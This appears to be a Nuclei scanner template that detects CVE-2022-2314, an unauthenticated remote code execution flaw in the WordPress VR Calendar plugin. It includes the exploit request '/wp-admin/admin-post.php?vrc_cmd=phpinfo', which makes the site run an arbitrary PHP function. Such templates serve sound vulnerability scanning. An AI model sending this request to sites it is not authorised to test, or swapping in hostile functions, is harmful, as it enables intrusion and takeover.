55 lines
1.6 KiB
YAML
55 lines
1.6 KiB
YAML
id: CVE-2022-2314
|
|
|
|
info:
|
|
name: WordPress VR Calendar <=2.3.2 - Remote Code Execution
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82
|
|
- https://wordpress.org/plugins/vr-calendar-sync/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2314
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-2314
|
|
cwe-id: CWE-94
|
|
cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:*:*:*
|
|
epss-score: 0.04893
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- "phpinfo"
|
|
- "PHP Version"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: body_1
|
|
words:
|
|
- "vrc-calendar"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by md on 2023/03/22
|